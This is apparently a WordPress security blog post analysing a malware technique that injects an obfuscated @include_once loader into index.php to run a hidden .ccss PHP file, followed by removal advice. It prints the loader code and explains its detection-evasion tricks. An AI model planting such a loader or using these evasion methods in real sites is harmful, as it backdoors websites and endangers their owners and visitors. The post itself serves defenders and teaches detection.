The new WordPress tampering technique, the inclusion of .ccss malware, will be explained.

WordPress index.php tampering with .ccss includes

This malware modifies and embeds the following code in the index.php file, which is executed whenever a WordPress page is loaded.

<?php
/*307a3*/

$r2r = "/home/*****/w\x70\x2dincludes/images/media/.36050178.ccss"; strpos($r2r, '97to'); @include_once /* 6ejs7 */ ($r2r);

/*307a3*/

A.This code uses many techniques to avoid detection of malware.

B.\x converts some strings to UTF-8 decimal type.

C.It once puts the path into a variable to make it harder to match the detection pattern.

D.Putting a comment after @include_once to prevent detection pattern matching.

The comment text (/*307a3*/) of a random string of characters above and below the include statement is used to check whether malware tampering code remains.

The body of the malware is a file with the extension .ccss

The embedded program containing this malicious @include statement is not the malware itself, but a file with a random string + .ccss extension that is loaded by specifying the path with the @include statement.

The .ccss extension is not originally used as a file to be placed on the Web, but its content is a PHP program file like the one shown below, which is loaded and executed by the @include statement.

How do I get rid of this malware?

You need to delete the .ccss file of the include text and the malware itself after detecting or visually inspecting the malware with plugins, etc. The .ccss file of the malware itself may be located in a very deep folder, or its location may vary depending on the site. The .ccss file of the malware itself is located in a very deep folder, or its location varies from site to site, so it may be difficult to manually check each folder one by one.

The malware itself loaded with @include statement converts some strings to UTF-8 decimal type with ⌘x, so it is hard to tell where the path points to at a glance.
Such obfuscated programs can be unobfuscated here
It may be easier to unobfuscate the path and delete the body in that path.

It is also possible that there are other backdoors or other sites on the server that are infected.
We recommend that you use plugins to detect and remove malware from other sites on the server as well, and if this is unmanageable, we recommend that you contact a specialist.

Related Posts:

  1. Five types of malware embedded in WordPress
    Here are some of the types of malware embedded in WordPress that are common these days. If similar code is included in the site’s program, we suspect that WordPress has been hacked and tampered with....
  2. If your wordpress index.php has a one line include statement @include it is infected with malware
    If there is a one-line include statement @include in the index.php in the top directory of WordPress or in the theme, etc., it is highly likely that the site is infected with malware....
  3. How to remove WordPress malware (tampering and viruses) with plugins
    We will explain how to decontaminate malware using the WordPress:Malware Scan & Security plugin [Malware and Virus Detection and Removal], which was created by WordPress Doctor based on his experience with numerous malware removal requests....
  4. Cases in which malware (virus infection, tampering) prevents logging in to the management screen
    There have been an increasing number of cases where a hacker has embedded a number of malicious HTACCESS files in a site, making it impossible to log in to the administration screen. This case study will be explained in this issue....
  5. What if I get infected with malware disguised as an ico file in wordpress?
    We will provide an explanation of the malware that disguises itself as an ico file, which has recently been on a rampage, and introduce countermeasures....
  6. How to find hidden malware (tampering) in WordPress
    If WordPress redirects you to a different site or disables some features of the administration panel, you may have been infected with malware. In this case, if the malware has been removed and the site keeps re-infecting itself, it is possible that a backdoor, or malicious program, remains somewhere on the site....